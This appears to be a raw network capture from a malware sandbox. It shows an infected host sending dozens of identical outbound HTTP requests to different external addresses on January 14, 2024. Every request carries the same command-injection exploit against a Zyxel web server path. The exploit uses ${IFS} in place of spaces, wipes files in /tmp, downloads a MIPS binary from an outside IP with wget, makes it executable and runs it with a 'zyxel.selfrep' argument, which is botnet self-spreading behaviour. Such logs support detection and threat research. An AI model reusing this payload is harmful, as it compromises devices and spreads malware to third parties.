                                          Jan 14, 2024 15:46:20.079003096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5209192.168.2.2353062205.145.155.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079039097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5210192.168.2.233453041.204.17.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079078913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5211192.168.2.233925023.250.123.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079112053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5212192.168.2.233722412.175.228.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079147100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5213192.168.2.234955073.218.235.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079150915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5214192.168.2.234059864.80.239.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079174995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5215192.168.2.2342936208.55.105.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079185009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5216192.168.2.2338306211.159.170.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079267025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5217192.168.2.2341604155.67.128.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079283953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5218192.168.2.2346602124.18.125.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079319954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5219192.168.2.2345652163.138.112.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079345942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5220192.168.2.234222472.217.60.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079413891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5221192.168.2.233965460.149.157.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079449892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5222192.168.2.235964899.137.87.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079472065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5223192.168.2.2333102174.96.168.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079528093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5224192.168.2.2356122222.87.13.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079557896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5225192.168.2.2339188205.3.16.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079607964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5226192.168.2.2348252212.218.186.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079638958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5227192.168.2.233489863.223.19.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079667091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5228192.168.2.2347092114.147.196.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079679966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5229192.168.2.2354450207.106.25.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079715014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5230192.168.2.234613838.102.105.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079729080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5231192.168.2.2344874136.28.9.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079765081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5232192.168.2.2356692132.223.91.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079818010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5233192.168.2.2357892190.110.34.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079859972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5234192.168.2.233545090.178.75.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079899073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5235192.168.2.23555624.26.216.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079948902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5236192.168.2.2334758145.25.133.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.079986095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5237192.168.2.2356056184.193.197.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080001116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5238192.168.2.235807054.142.144.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080041885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5239192.168.2.234350654.235.204.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080094099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5240192.168.2.2352562188.77.253.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080146074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5241192.168.2.23609864.37.91.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080188036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5242192.168.2.2344140180.211.32.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080239058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5243192.168.2.234564249.192.250.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080296993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5244192.168.2.2342772135.186.187.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080329895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5245192.168.2.2337194153.236.154.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080358982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5246192.168.2.234558063.246.214.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080399990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5247192.168.2.2347086178.44.79.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080446959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5248192.168.2.233883452.38.194.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080492973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5249192.168.2.2343404146.222.19.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080518961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5250192.168.2.235129683.136.39.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080533028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5251192.168.2.2358246216.16.101.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080606937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5252192.168.2.2357968222.239.179.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080657005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5253192.168.2.234779654.255.190.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080674887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5254192.168.2.23406121.12.91.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080698013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5255192.168.2.2342702117.238.43.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080756903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5256192.168.2.2356292158.27.51.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080774069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5257192.168.2.2335180148.30.66.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080852985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5258192.168.2.235909062.9.64.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080897093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5259192.168.2.2335584107.202.46.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080912113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5260192.168.2.2336360123.112.165.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080981016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5261192.168.2.2339952147.219.137.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.080991030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5262192.168.2.235016689.164.245.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081032038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5263192.168.2.2338594183.156.161.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081037998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5264192.168.2.2341574118.210.40.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081068039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5265192.168.2.2358280110.121.61.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081093073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5266192.168.2.2334134189.72.82.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081146002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5267192.168.2.2333272147.152.163.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081176996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5268192.168.2.2344306167.180.51.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081216097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5269192.168.2.2359536155.130.149.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081243992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5270192.168.2.2346076211.120.39.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081284046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5271192.168.2.235822212.64.226.82443
                                          TimestampBytes transferredDirectionData
